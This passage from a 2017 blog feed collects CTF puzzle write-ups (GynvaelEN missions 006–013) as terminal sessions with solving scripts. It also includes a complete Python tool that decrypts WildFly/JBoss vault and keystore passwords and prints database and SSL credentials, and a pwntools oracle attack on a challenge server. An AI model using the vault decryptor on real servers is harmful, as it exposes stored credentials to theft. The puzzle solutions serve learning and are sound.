0x000049aa c685d7feffff. mov byte [rbp - 0x129], 0x39 ; '9'
0x000049b1 c685d8feffff. mov byte [rbp - 0x128], 0x31 ; '1'
0x000049b8 c685d9feffff. mov byte [rbp - 0x127], 0xea
0x000049bf c685dafeffff. mov byte [rbp - 0x126], 0x8f
0x000049c6 c685dbfeffff. mov byte [rbp - 0x125], 0xea
0x000049cd c685dcfeffff. mov byte [rbp - 0x124], 0x5d ; ']'
0x000049d4 c685ddfeffff. mov byte [rbp - 0x123], 0x2b ; '+'
0x000049db c685defeffff. mov byte [rbp - 0x122], 0x5b ; '['
0x000049e2 c685dffeffff. mov byte [rbp - 0x121], 0x39 ; '9'
0x000049e9 c685e0feffff. mov byte [rbp - 0x120], 0x39 ; '9'
0x000049f0 c685e1feffff. mov byte [rbp - 0x11f], 0xf0
0x000049f7 48c785b0feff. mov qword [rbp - 0x150], 0
.-> 0x00004a02 488b85b0feff. mov rax, qword [rbp - 0x150]
| 0x00004a09 483b85b8feff. cmp rax, qword [rbp - 0x148]
,==< 0x00004a10 7349 jae 0x4a5b
|| 0x00004a12 488d95c0feff. lea rdx, qword [rbp - 0x140]
|| 0x00004a19 488b85b0feff. mov rax, qword [rbp - 0x150]
|| 0x00004a20 4801d0 add rax, rdx ; '('
|| 0x00004a23 0fb610 movzx edx, byte [rax]
|| 0x00004a26 488d8df0feff. lea rcx, qword [rbp - 0x110]
|| 0x00004a2d 488b85b0feff. mov rax, qword [rbp - 0x150]
|| 0x00004a34 4801c8 add rax, rcx ; '&'
|| 0x00004a37 0fb600 movzx eax, byte [rax]
|| 0x00004a3a 38c2 cmp dl, al
,===< 0x00004a3c 7413 je 0x4a51
||| 0x00004a3e 488d3dd80000. lea rdi, qword 0x00004b1d ; 0x4b1d
||| 0x00004a45 e8e6fbffff call 0x4630
||| 0x00004a4a b803000000 mov eax, 3
,====< 0x00004a4f eb1b jmp 0x4a6c
|`---> 0x00004a51 488385b0feff. add qword [rbp - 0x150], 1
| |`=< 0x00004a59 eba7 jmp 0x4a02
| `--> 0x00004a5b 488d3dc00000. lea rdi, qword 0x00004b22 ; 0x4b22
| 0x00004a62 e8c9fbffff call 0x4630
| 0x00004a67 b800000000 mov eax, 0
`----> 0x00004a6c 488b75f8 mov rsi, qword [rbp - 8]</output>
# <code>ipython</code>
In [1]: <code>table = [0x8e, 0x32, 0x2f, 0x39, 0xea, 0x2d, 0x27, 0x39, 0xea, 0x27, 0xea, 0x88, 0x25, 0x94, 0x3b, 0x30, 0x39, 0x2f, 0x29, 0x39, 0xea, 0x2e, 0x27, 0x39, 0x31, 0xea, 0x8f, 0xea, 0x5d, 0x2b, 0x5b, 0x39, 0x39, 0xf0]</code>
...: <code>r = ''</code>
...: <code>for e in table:</code>
...: <code>r += chr(((((e - 0x63) ^ 0x5a) - 0x63) ^ 0x5a) & 0xff)</code>
...: <code>print r</code>
...:
<output>This was a FoREnsics task I guess.</output></pre><br />
<u>Source</u><br />
<br />
https://www.youtube.com/watch?v=7zTtVYjjquA (1:58:10)<br />
<br />
<u>Reference</u><br />
<br />
https://sourceware.org/gdb/onlinedocs/gdb/Remote-Protocol.htmlUnknownnoreply@blogger.com0tag:blogger.com,1999:blog-7720315221103141474.post-89156726972683978062017-08-04T23:37:00.000+02:002017-08-16T21:30:51.405+02:00# GynvaelEN mission 012<br />
<pre># <code>curl -s http://www.computer-engineering.org/ps2keyboard/scancodes2.html | tr [:upper:] [:lower:] > scan_codes.html</code>
# <code>for i in 12 1b 1c 23 24 29 2c 2d 31 32 35 41 42 43 44 49 4d 52 58 59; do result=`cat scan_codes.html | grep '<tt>' | grep -m1 -B1 "<tt>$i</tt>" | sed 's/<[^>]*>//g' | tr -d ' '| tr -d '\r'`; key=`echo "$result" | tail -n1`; value=`echo "$result" | head -n1`; echo "0x$key: '$value',"; done</code>
<output>0x12: 'lshft',
0x1b: 's',
0x1c: 'a',
0x23: 'd',
0x24: 'e',
0x29: 'space',
0x2c: 't',
0x2d: 'r',
0x31: 'n',
0x32: 'b',
0x35: 'y',
0x41: ',',
0x42: 'k',
0x43: 'i',
0x44: 'o',
0x49: '.',
0x4d: 'p',
0x52: ''',
0x58: 'caps',
0x59: 'rshft'
</output>
# <code>cat keylogger.py</code>
<output>'''
<highlight>0x58</highlight> 0xf0 <highlight>0x58</highlight>
0x1b 0xf0 0x1b
<highlight>0x58</highlight> 0xf0 <highlight>0x58</highlight>
0x44 0xf0 0x44
0x2d 0xf0 0x2d
0x2d 0xf0 0x2d
0x35 0xf0 0x35
0x41 0xf0 0x41
0x29 0xf0 0x29
<highlight>0x59</highlight> 0x43 0xf0 0x43 0xf0 <highlight>0x59</highlight>
0x29 0xf0 0x29
0x23 0xf0 0x23
0x44 0xf0 0x44
0x31 0xf0 0x31
0x52 0xf0 0x52
0x2c 0xf0 0x2c
0x29 0xf0 0x29
0x1b 0xf0 0x1b
0x4d 0xf0 0x4d
0x24 0xf0 0x24
0x1c 0xf0 0x1c
0x42 0xf0 0x42
0x29 0xf0 0x29
<highlight>0x12</highlight> 0x42 0xf0 0x42 0xf0 <highlight>0x12</highlight>
0x24 0xf0 0x24
0x35 0xf0 0x35
0x32 0xf0 0x32
0x44 0xf0 0x44
0x1c 0xf0 0x1c
0x2d 0xf0 0x2d
0x23 0xf0 0x23
0x49 0xf0 0x49
'''
# Scan Codes
sc = {
0x12: 'lshft',
0x1b: 's',
0x1c: 'a',
0x23: 'd',
0x24: 'e',
0x29: ' ',
0x2c: 't',
0x2d: 'r',
0x31: 'n',
0x32: 'b',
0x35: 'y',
0x41: ',',
0x42: 'k',
0x43: 'i',
0x44: 'o',
0x49: '.',
0x4d: 'p',
0x52: '\'',
0x58: 'caps',
0x59: 'rshft'
}
data = [0x58, 0xf0, 0x58, 0x1b, 0xf0, 0x1b, 0x58, 0xf0, 0x58, 0x44, 0xf0, 0x44, 0x2d, 0xf0, 0x2d, 0x2d, 0xf0, 0x2d, 0x35, 0xf0, 0x35, 0x41, 0xf0, 0x41, 0x29, 0xf0, 0x29, 0x59, 0x43, 0xf0, 0x43, 0xf0, 0x59, 0x29, 0xf0, 0x29, 0x23, 0xf0, 0x23, 0x44, 0xf0, 0x44, 0x31, 0xf0, 0x31, 0x52, 0xf0, 0x52, 0x2c, 0xf0, 0x2c, 0x29, 0xf0, 0x29, 0x1b, 0xf0, 0x1b, 0x4d, 0xf0, 0x4d, 0x24, 0xf0, 0x24, 0x1c, 0xf0, 0x1c, 0x42, 0xf0, 0x42, 0x29, 0xf0, 0x29, 0x12, 0x42, 0xf0, 0x42, 0xf0, 0x12, 0x24, 0xf0, 0x24, 0x35, 0xf0, 0x35, 0x32, 0xf0, 0x32, 0x44, 0xf0, 0x44, 0x1c, 0xf0, 0x1c, 0x2d, 0xf0, 0x2d, 0x23, 0xf0, 0x23, 0x49, 0xf0, 0x49]
may = False
shift = False
stack = []
decoded = ''
for i in data:
#print i
if i != 240:
letter = sc[i]
#print letter, stack
if letter in stack:
stack.remove(letter)
else:
stack.append(letter)
if letter == 'caps': may = not may
elif 'shft' in letter: shift = True
else:
if may:
decoded += letter.upper()
elif shift:
decoded += letter.upper()
shift = False
else:
decoded += letter
print decoded</output>
# <code>python keylogger.py</code>
<output>Sorry, I don't speak Keyboard.</output></pre><br />
<u>Source</u><br />
<br />
https://www.youtube.com/watch?v=4Xo_FAx6P0A (1:51:20)<br />
<br />
<u>Done in collaboration</u><br />
<br />
https://atorralba.github.io/<br />
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-7720315221103141474.post-64267693891880848812017-08-03T00:14:00.000+02:002017-08-16T21:19:43.382+02:00# GynvaelEN mission 011<br />
<pre># <code>cat mission_11-firmware.txt</code>
<output># Number of arguments this code object expects
co_argcount 1
# Tuple of constant objects
co_consts (None, '4e5d4e92865a4e495a86494b5a5d49525261865f5758534d4a89', 'hex', 89, 255, 115, 50)
# Flags
co_flags 67
# Function name
co_name check_password
# Names used
co_names ('decode', 'len', 'False', 'all', 'zip', 'ord')
# Number of local variables
co_nlocals 4
# The depth of the stack
co_stacksize 6
# Argument names
co_varnames ('s', 'good', 'cs', 'cg')
0 LOAD_CONST 1 stack[0] = '4e5d4e92865a4e495a86494b5a5d49525261865f5758534d4a89'
3 LOAD_ATTR 0 names[0] # decode
6 LOAD_CONST 2 stack[1] = 'hex'
9 CALL_FUNCTION 1 stack[0] = 'N]N\x92\x86ZNIZ\x86IKZ]IRRa\x86_WXSMJ\x89' # 26
12 STORE_FAST 1 good = 'N]N\x92\x86ZNIZ\x86IKZ]IRRa\x86_WXSMJ\x89' # 26; stack is empty
15 LOAD_GLOBAL 1 stack[0] = 'len'
18 LOAD_FAST 0 stack[1] = 's'
21 CALL_FUNCTION 1 ?; stack is empty
24 LOAD_GLOBAL 1 stack[0] = 'len'
27 LOAD_FAST 1 stack[1] = 'good'
30 CALL_FUNCTION 1 26; stack is empty
33 COMPARE_OP 3 (!=) len(s) != len(goog)
36 POP_JUMP_IF_FALSE 43 if eq goto 43
39 LOAD_GLOBAL 2 else stack[0] = 'False'
42 RETURN_VALUE return 'False'
>> 43 LOAD_GLOBAL 3 stack[0] = 'all'
46 BUILD_LIST 0 stack[0] = ['all']
49 LOAD_GLOBAL 4 stack[1] = 'zip'
52 LOAD_FAST 0 stack[2] = 's'
55 LOAD_FAST 1 stack[3] = 'good'
58 CALL_FUNCTION 2 stack[0] = zip(s, good)
61 GET_ITER stack[0] = iter(zip(s, good))
>> 62 FOR_ITER 52 (to 117)
65 UNPACK_SEQUENCE 2 stack[1] = s[i], good[i]
68 STORE_FAST 2 cs = s[i]
71 STORE_FAST 3 cg = good[i]
74 LOAD_GLOBAL 5 stack[0] = 'ord'
77 LOAD_FAST 2 stack[1] = cs
80 CALL_FUNCTION 1 stack[0] = ord(cs)
83 LOAD_CONST 3 stack[1] = 89
86 BINARY_SUBTRACT stack[0] = ord(cs) - 89
87 LOAD_CONST 4 stack[1] = 255
90 BINARY_AND stack[0] = (ord(cs) - 89) & 255
91 LOAD_CONST 5 stack[1] = 115
94 BINARY_XOR stack[0] = ((ord(cs) - 89) & 255) ^ 115
95 LOAD_CONST 6 stack[1] = 50
98 BINARY_XOR stack[0] = (((ord(cs) - 89) & 255) ^ 115) ^ 50
99 LOAD_GLOBAL 5 stack[1] = 'ord'
102 LOAD_FAST 3 stack[2] = cg
105 CALL_FUNCTION 1 stack[1] = ord(cg)
108 COMPARE_OP 2 (==) computed_cg == cg
111 LIST_APPEND 2
114 JUMP_ABSOLUTE 62 goto 62
>> 117 CALL_FUNCTION 1
120 RETURN_VALUE</output>
# <code>cat mission_11.py</code>
<output>password = ''
for i in '4e5d4e92865a4e495a86494b5a5d49525261865f5758534d4a89'.decode('hex'):
password += chr(255 & (89 + (ord(i) ^ 50 ^ 115)))
print password</output>
# <code>python mission_11.py</code>
<output>huh, that actually worked!</output></pre><br />
<u>Source</u><br />
<br />
https://www.youtube.com/watch?v=s5gOW-N9AAo (1:46:20)<br />
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-7720315221103141474.post-82336336865721100012017-07-27T17:59:00.000+02:002017-08-16T21:19:50.727+02:00# GynvaelEN mission 010<br />
<pre># <code>cat mission_10.py</code>
<output>from pwn import *
host = '31.133.0.131' #'127.0.0.1'
port = 9393
def get_mask_len():
i = 64
while True:
j = i * 8
r = remote(host, port)
r.sendlineafter('\n', 'A' * j)
re = r.recvuntil('\n')
r.close()
if 'Meh' in re:
break
i += 1
return j
def get_secret2():
b1 = '00000001'
mask = b1 * (ml / 8)
r = remote(host, port)
r.sendlineafter('\n', mask)
re = r.recvuntil('\n')
b0 = '0'
bits = b0 * (ml / 8)
r.sendline(bits)
re = r.recvuntil('\n')
if 'Access Granted' in re:
for _ in range(4):
print r.recvuntil('\n')
r.close()
def get_bits():
b = ''
for i in range(len(mask)):
if mask[i] == '1':
b += secret1[i]
return b
def check_result(m, b):
r = remote(host, port)
r.sendlineafter('\n', m)
re = r.recvuntil('\n')
r.sendline(b)
re = r.recvuntil('\n')
r.close()
return re
def binary_to_str(binary):
s = ''
for i in range(0, len(binary), 8):
b = ''
for j in range(8):
b = binary[i + j] + b
s += chr(int(b, 2))
return s
def get_secret1():
for i in range(len(mask)):
if mask[i] == '0':
mask[i] = '1'
tmask = ''.join(mask)
for j in '01':
secret1[i] = j
bits = get_bits()
if 'Access Granted' in check_result(tmask, bits):
break
ml = get_mask_len()
get_secret2()
secret1 = ['0'] * ml
mask = [i for i in '00000001'] * (ml / 8)
get_secret1()
print binary_to_str(get_bits())</output>
# <code>python mission_10.py</code>
<output>You have received one secret message:
---
Just Another Secret Message
---
This Crypto Is Absolutely Secure And There Will Be No Problem With It.</output></pre><br />
<u>Source</u><br />
<br />
https://www.youtube.com/watch?v=Vs8PLpHCoNY (1:45:30)<br />
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-7720315221103141474.post-65917757344629240082017-07-22T20:25:00.000+02:002017-08-16T21:19:57.360+02:00# GynvaelEN mission 009<br />
<pre># <code>cat mission_09.py</code>
<output>import datetime
# Microsoft rand
def rand():
global seed
seed = (seed * 214013 + 2531011) % 2147483648
return seed / 65536
key = [0] * 31
secret = [0] * 31
xor = [0x9a, 0x60, 0x76, 0x14, 0x8b, 0x36, 0x5a, 0x10, 0x2b, 0x91, 0xc4, 0x6c, 0xab, 0x27, 0x92, 0x99, 0xf8, 0x6a, 0xec, 0x5d, 0x32, 0x20, 0x3d, 0x61, 0x8f, 0xc7, 0xfb, 0xdd, 0x02, 0x72, 0xbf]
for s in range(1500336000, 1500508800):
seed = s
for i in range(31):
eax = rand()
rdx = (2139127681 * eax) >> 39
ecx = eax >> 31
edx = (rdx & 0xffffffff) - ecx
ecx = edx << 8
edx += ecx
eax -= edx
key[i] = eax & 0xff
for i in range(31):
secret[i] = (xor[i] ^ key[i]) & 0xff
if all(c < 128 for c in secret):
print 'seed =', s
print 'time = ', datetime.datetime.fromtimestamp(s)
print ''.join([chr(c) for c in secret])
break</output>
# <code>python mission_09.py</code>
<output>seed = 1500483661
time = 2017-07-19 18:01:01
Who needs to store keys anyway.</output></pre><br />
<u>Source</u><br />
<br />
https://www.youtube.com/watch?v=7RotbY17tKk (1:47:55)<br />
<br />
<u>Reference</u><br />
<br />
https://en.wikipedia.org/wiki/COFFUnknownnoreply@blogger.com0tag:blogger.com,1999:blog-7720315221103141474.post-90882705463741603502017-07-19T21:53:00.000+02:002017-08-04T23:43:14.116+02:00# Decrypt Wildfly/Jboss vault passwords<br />
<pre># <code>cat standalone.xml</code>
<output>...
<vault>
<vault-option name="<highlight>KEYSTORE_URL</highlight>" value="${user.home}/<highlight>vault.store</highlight>"/>
<vault-option name="<highlight>KEYSTORE_PASSWORD</highlight>" value="<highlight>MASK-3y28rCZlcKR</highlight>"/>
<vault-option name="<highlight>KEYSTORE_ALIAS</highlight>" value="<highlight>vault</highlight>"/>
<vault-option name="<highlight>SALT</highlight>" value="<highlight>12438567</highlight>"/>
<vault-option name="<highlight>ITERATION_COUNT</highlight>" value="<highlight>50</highlight>"/>
<vault-option name="<highlight>ENC_FILE_DIR</highlight>" value="${user.home}/<highlight>vault.dat</highlight>"/>
</vault>
...</output>
# <code>cat vaultbreaker.py</code>
<output>import hashlib
import javaobj # pip install javaobj-py3
import jks # pip install pyjks
import string
import sys
from Crypto.Cipher import AES, DES
def clean(s):
return filter(lambda x: x in string.printable, s).strip()
def get_derived_key(password, salt, count):
key = password + salt
for i in range(count):
m = hashlib.md5(key)
key = m.digest()
return (key[:8], key[8:])
def customb64decode(msg):
alphabet = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz./_'
result = ''
for i in range(0, len(msg), 4):
p0 = alphabet.index(msg[i])
p1 = alphabet.index(msg[i + 1])
p2 = alphabet.index(msg[i + 2])
p3 = alphabet.index(msg[i + 3])
if p0 != 64:
result += chr(((p1 & 0x30) >> 4) | (p0 << 2))
if p1 != 64:
result += chr(((p2 & 0x3c) >> 2) | ((p1 & 0xf) << 4))
result += chr(((p2 & 3) << 6) | p3)
return result
def decrypt_keystore_password(enc_keystore_password, password, salt, iteration_count):
num = 4 - (len(enc_keystore_password) % 4)
if num != 4:
enc_keystore_password = ('_' * num) + enc_keystore_password
enc_text = customb64decode(enc_keystore_password)
(dk, iv) = get_derived_key(password, salt, iteration_count)
crypter = DES.new(dk, DES.MODE_CBC, iv)
text = crypter.decrypt(enc_text)
return clean(text)
def get_secret_key(keystore_filename, alias, keystore_password):
ks = jks.KeyStore.load(keystore_filename, keystore_password)
for a, sk in ks.secret_keys.items():
if a == alias:
return sk.key
return null
def decrypt_vault_passwords(vault_filename, secret_key):
decryption_suite = AES.new(secret_key, AES.MODE_ECB)
print '[+] Vault passwords ='
jobj = open(vault_filename).read()
pobj = javaobj.loads(jobj)
for i in range(0, len(pobj.annotations[1].annotations), 2):
key = pobj.annotations[1].annotations[i]
value = pobj.annotations[1].annotations[i + 1]
if key:
plain_text = decryption_suite.decrypt(str(value))
print '\t -', key, '=', clean(plain_text)
passwd = "somearbitrarycrazystringthatdoesnotmatter"
KEYSTORE_PASSWORD = sys.argv[1]
KEYSTORE_ALIAS = sys.argv[2]
SALT = sys.argv[3]
ITERATION_COUNT = int(sys.argv[4])
keystore_filename = sys.argv[5]
vault_filename = sys.argv[6]
keystore_password = decrypt_keystore_password(KEYSTORE_PASSWORD, passwd, SALT, ITERATION_COUNT)
print '[+] Keystore password = ' + keystore_password
secret_key = get_secret_key(keystore_filename, KEYSTORE_ALIAS, keystore_password)
print '[+] Secretkey password = ' + secret_key.encode('hex')
decrypt_vault_passwords(vault_filename, secret_key)</output>
# <code>python vaultbreaker.py 3y28rCZlcKR vault 12438567 50 vault.store vault.dat</code>
<output>[+] Keystore password = vault22
[+] Secretkey password = 0e8f11aae5222d8280533a93bfaff4c3
[+] Vault passwords =
- ssl::SSLUSER = ssl_user
- datasource::HOST = 192.1.2.3
- ssl::SSLPASS = ssl_pass
- ssl::SSLALIAS = test
- datasource::PORT = 1521
- datasource::PASS = db_pass
- datasource::SERVICENAME = db
- datasource::USER = db_user</output></pre><br />
<u>Reference</u><br />
<br />
https://developer.jboss.org/wiki/JBossAS7SecuringPasswords<br />
<br />
<u>Done in collaboration</u><br />
<br />
https://atorralba.github.io/Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-7720315221103141474.post-59935368690636265142017-07-15T11:17:00.000+02:002017-08-16T21:20:03.333+02:00# GynvaelEN mission 008<br />
<pre># <code>cat mission_08.py</code>
<output>number = 1087943696176439095600323762148055792209594928798662843208446383247024
i = 1
while True:
h = hex(number / i)[2:-1]
if len(h) % 2 == 0:
s = h.decode('hex')
if all(ord(c) < 128 for c in s):
print s, i
break
i += 1</output>
# <code>python mission_08.py</code>
<output>Text is just a long number. 31336</output></pre><br />
<u>Source</u><br />
<br />
https://www.youtube.com/watch?v=OAk23u9b-88 (1:50:10)Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-7720315221103141474.post-83775538717168176002017-07-02T17:29:00.000+02:002017-08-16T21:20:09.562+02:00# GynvaelEN mission 007<br />
<pre># <code>cat parser.py</code>
<output># 00000000 50 4b 03 04 14 00 00 00 00 00 fc 96 dc 4a 73 03 |PK...........Js.|
# 00000010 1a 7b 5e 00 00 00 7a 00 <highlight>00</highlight> 00 0a 00 00 00 72 65 |.{^...z.......re|
# 00000020 70 6f 72 74 2e 74 78 74 f8 07 54 16 3b 8b 63 cc |port.txt..T.;.c.|
# 00000030 78 b7 03 42 4c 35 b8 0f 72 43 87 8f ab a8 55 3b |x..BL5..rC....U;|
# 00000040 7f ee 9b 48 88 1a 2b cb f3 52 73 bf 6f e2 11 37 |...H..+..Rs.o..7|
# 00000050 f2 06 a9 d3 53 12 2b d1 fe ff 47 34 58 be be 03 |....S.+...G4X...|
# 00000060 7f cb 15 08 b2 5a 58 2e 3a 51 61 1c b2 db 63 b6 |.....ZX.:Qa...c.|
# 00000070 5e 3a 76 98 0b 9a 32 12 88 cb b2 8c d3 d6 d4 fa |^:v...2.........|
# 00000080 b7 37 b5 27 00 00 50 4b 01 02 14 00 14 00 00 00 |.7.'..PK........|
# 00000090 <highlight>00</highlight> 00 fc 96 dc 4a 73 03 1a 7b 5e 00 00 00 7a 00 |.....Js..{^...z.|
# 000000a0 00 00 0a 00 24 00 00 00 00 00 01 00 20 00 00 00 |....$....... ...|
# 000000b0 00 00 00 00 72 65 70 6f 72 74 2e 74 78 74 0a 00 |....report.txt..|
# 000000c0 20 00 00 00 00 00 01 00 18 00 00 6e 5c 69 2f f0 | ..........n\i/.|
# 000000d0 d2 01 00 6e 5c 69 2f f0 d2 01 80 d0 e0 52 2f f0 |...n\i/......R/.|
# 000000e0 d2 01 50 4b 05 06 00 00 00 00 01 00 01 00 5c 00 |..PK..........\.|
# 000000f0 00 00 86 00 00 00 00 00 |........|
# 000000f8
import struct
import sys
def extract_bytes(offset, num, ctype = None):
j = offset
k = j + num
if ctype:
return struct.unpack(ctype, data[j:k])[0]
else:
return repr(data[j:k])
with open(sys.argv[1]) as f:
data = f.read()
ep = 0
print 'Local file header signature', extract_bytes(ep + 0, 4)
print 'Version needed to extract', extract_bytes(ep + 4, 2)
print 'General purpose bit flag', extract_bytes(ep + 6, 2)
print 'Compression method', extract_bytes(ep + 8, 2)
print 'File last modification time', extract_bytes(ep + 10, 2)
print 'File last modification date', extract_bytes(ep + 12, 2)
print 'CRC-32', extract_bytes(ep + 14, 4)
cs = extract_bytes(ep + 18, 4, '<I')
print 'Compressed size', cs
print 'Uncompressed size', extract_bytes(ep + 22, 4)
n = extract_bytes(ep + 26, 2, '<H')
print 'File name length (n)', n
m = extract_bytes(ep + 28, 2, '<H')
print 'Extra field length (m)', m
print 'File name', extract_bytes(ep + 30, n)
print 'Extra field', extract_bytes(ep + 30 + n, m)
print '--------'
epcdfhs = data.index('PK\x01\x02')
i = ep + 30 + n
j = epcdfhs - cs - i
print 'Extra field', extract_bytes(i, j)
print 'Compressed data', extract_bytes(i + j, cs)
print '--------'
ep = epcdfhs
print 'Central directory file header signature', extract_bytes(ep + 0, 4)
print 'Version made by', extract_bytes(ep + 4, 2)
print 'Version needed to extract', extract_bytes(ep + 6, 2)
print 'General purpose bit flag', extract_bytes(ep + 8, 2)
print 'Compression method', extract_bytes(ep + 10, 2)
print 'File last modification time', extract_bytes(ep + 12, 2)
print 'File last modification date', extract_bytes(ep + 14, 2)
print 'CRC-32', extract_bytes(ep + 16, 4)
print 'Compressed size', extract_bytes(ep + 20, 4)
print 'Uncompressed size', extract_bytes(ep + 24, 4)
n = extract_bytes(ep + 28, 2, '<H')
print 'File name length (n)', n
m = extract_bytes(ep + 30, 2, '<H')
print 'Extra field length (m)', m
k = extract_bytes(ep + 32, 2, '<H')
print 'File comment length (k)', k
print 'Disk number where file starts', extract_bytes(ep + 34, 2)
print 'Internal file attributes', extract_bytes(ep + 36, 2)
print 'External file attributes', extract_bytes(ep + 38, 4)
print 'Relative offset of local file header', extract_bytes(ep + 42, 4)
print 'File name', extract_bytes(ep + 46, n)
print 'Extra field', extract_bytes(ep + 46 + n, m)
print 'File comment', extract_bytes(ep + 46 + n + m, k)</output>
# <code>python parser.py report.zip</code>
<output>Local file header signature 'PK\x03\x04'
Version needed to extract '\x14\x00'
General purpose bit flag '\x00\x00'
Compression method '<highlight>\x00</highlight>\x00'
File last modification time '\xfc\x96'
File last modification date '\xdcJ'
CRC-32 's\x03\x1a{'
Compressed size 94
Uncompressed size 'z\x00\x00\x00'
File name length (n) 10
Extra field length (m) 0
File name 'report.txt'
Extra field ''
--------
Extra field ''
Compressed data "\xf8\x07T\x16;\x8bc\xccx\xb7\x03BL5\xb8\x0frC\x87\x8f\xab\xa8U;\x7f\xee\x9bH\x88\x1a+\xcb\xf3Rs\xbfo\xe2\x117\xf2\x06\xa9\xd3S\x12+\xd1\xfe\xffG4X\xbe\xbe\x03\x7f\xcb\x15\x08\xb2ZX.:Qa\x1c\xb2\xdbc\xb6^:v\x98\x0b\x9a2\x12\x88\xcb\xb2\x8c\xd3\xd6\xd4\xfa\xb77\xb5'\x00\x00"
--------
Central directory file header signature 'PK\x01\x02'
Version made by '\x14\x00'
Version needed to extract '\x14\x00'
General purpose bit flag '\x00\x00'
Compression method '<highlight>\x00</highlight>\x00'
File last modification time '\xfc\x96'
File last modification date '\xdcJ'
CRC-32 's\x03\x1a{'
Compressed size '^\x00\x00\x00'
Uncompressed size 'z\x00\x00\x00'
File name length (n) 10
Extra field length (m) 36
File comment length (k) 0
Disk number where file starts '\x00\x00'
Internal file attributes '\x01\x00'
External file attributes ' \x00\x00\x00'
Relative offset of local file header '\x00\x00\x00\x00'
File name 'report.txt'
Extra field '\n\x00 \x00\x00\x00\x00\x00\x01\x00\x18\x00\x00n\\i/\xf0\xd2\x01\x00n\\i/\xf0\xd2\x01\x80\xd0\xe0R/\xf0\xd2\x01'
File comment ''</output>
# <code>cat generate_zipfiles.py</code>
<output>from subprocess import Popen, PIPE
from sys import argv
cm = { 0: 'The file is stored (no compression)',
1: 'The file is Shrunk',
2: 'The file is Reduced with compression factor 1',
3: 'The file is Reduced with compression factor 2',
4: 'The file is Reduced with compression factor 3',
5: 'The file is Reduced with compression factor 4',
6: 'The file is Imploded',
7: 'Reserved for Tokenizing compression algorithm',
8: 'The file is Deflated',
9: 'Enhanced Deflating using Deflate64(tm)',
10: 'PKWARE Data Compression Library Imploding (old IBM TERSE)',
11: 'Reserved by PKWARE',
12: 'File is compressed using BZIP2 algorithm',
13: 'Reserved by PKWARE',
14: 'LZMA (EFS)',
15: 'Reserved by PKWARE',
16: 'Reserved by PKWARE',
17: 'Reserved by PKWARE',
18: 'File is compressed using IBM TERSE (new)',
19: 'IBM LZ77 z Architecture (PFS)',
97: 'WavPack compressed data',
98: 'PPMd version I, Rev 1'
}
ofn = argv[1]
nfn = 'new'
rfn = 'report.txt'
with open(ofn) as f:
data = f.read()
for i in range(256):
data = data[:8] + chr(i) + data[9:144] + chr(i) + data[145:]
with open(nfn, 'wb') as f:
f.write(data)
command = '7z x ' + nfn
p = Popen(command.split(), stdout = PIPE, stderr = PIPE)
o, e = p.communicate()
if 'Everything is Ok' in o:
print i, cm[i]
command = 'cat ' + rfn
p = Popen(command.split(), stdout = PIPE, stderr = PIPE)
o, e = p.communicate()
print o
command = 'rm ' + nfn + ' ' + rfn
p = Popen(command.split(), stdout = PIPE, stderr = PIPE)
p.communicate()</output>
# <code>python generate_zipfiles.py report.zip</code>
<output>98 PPMd version I, Rev 1
The secret password is:
My name is Bond, James Bond.
Seriously, you could have guessed this based on the mission ID.</output></pre><br />
<u>Source</u><br />
<br />
https://www.youtube.com/watch?v=z9hfkajoAvc (1:25:15)<br />
<br />
<u>References</u><br />
<br />
https://en.wikipedia.org/wiki/Zip_(file_format)<br />
https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT (4.4.5)<br />
https://github.com/corkami/pics/blob/master/binary/zip101/zip101.pdfUnknownnoreply@blogger.com0tag:blogger.com,1999:blog-7720315221103141474.post-81198473738593733032017-06-24T12:25:00.001+02:002017-06-24T12:27:19.065+02:00# An XOR alternative<br />
<pre># <code>cat xor_alternative.py</code>
<output>import sys
# data contains hex chars (a-f + 0-9) and random chars
# Chars are not repeated
data = '2ubfLkR0vsJ#)=SQtXNcO6AYPT1U+ja7W*h9I-y4GeHzn5&BK;_@$U3dm8^%'
def obfuscate(s, step):
out = ''
ldata = len(data)
ls = len(s)
for i in s:
h = hex(ord(i))[2:]
for j in h:
p = data.index(j)
p2 = (p + step) % ldata
out += data[p2]
return out
def deobfuscate(s, step):
out = ''
ldata = len(data)
ls = len(s)
for i in range(0, ls, 2):
h = ''
for j in range(2):
p = data.index(s[i + j])
p2 = (p - step) % ldata
h += data[p2]
out += chr(int(h, 16))
return out
action = sys.argv[1]
s = sys.argv[2]
step = int(sys.argv[3])
print 'String =', s
print 'Step =', step
if action == 'o':
print 'Action = Obfuscate'
print 'Result =', obfuscate(s, step)
elif action == 'd':
print 'Action = Deobfuscate'
print 'Result =', deobfuscate(s, step)</output>
# <code>python xor_alternative.py o SECRET 1234</code>
<output>String = SECRET
Step = 1234
Action = Obfuscate
Result = c+=c=+ch=cc=</output>
# <code>python xor_alternative.py d c+=c=+ch=cc= 1234</code>
<output>String = c+=c=+ch=cc=
Step = 1234
Action = Deobfuscate
Result = SECRET</output></pre><br />
<u>Reference</u><br />
<br />
https://isc.sans.edu/forums/diary/Obfuscating+without+XOR/22544/Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-7720315221103141474.post-87448762484114907382017-06-22T00:37:00.000+02:002017-08-16T21:20:16.049+02:00# GynvaelEN mission 006<br />
<pre># <code>cat mission_06.py</code>
<output>from PIL import Image
import qrtools
n = 25
m = 3
fn = 'mission_06.png'
matrix = [255 for i in range(n * n)]
with open('mission_06.data') as f:
data = f.read().splitlines()
for line in data:
line = line[1:-1].split(', ')
i = int(line[0])
j = int(line[1])
matrix[(i*n) + j] = 0
image = Image.new('L', (n, n))
image.putdata(matrix)
image.save(fn)
img = Image.open(fn)
img = img.rotate(-90)
img = img.resize((n * m, n * m), Image.ANTIALIAS)
img.save(fn)
qr = qrtools.QR(filename = fn)
if qr.decode():
print qr.data</output>
# <code>python mission_06.py</code>
<output>Mirrored QR? Seriously?!</output></pre><br />
<u>Source</u><br />
<br />
https://www.youtube.com/watch?v=KvyBn4Btv8E (1:32:02)Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-7720315221103141474.post-44749030656025038972017-06-01T21:54:00.000+02:002017-08-16T21:20:22.800+02:00# GynvaelEN mission 005<br />
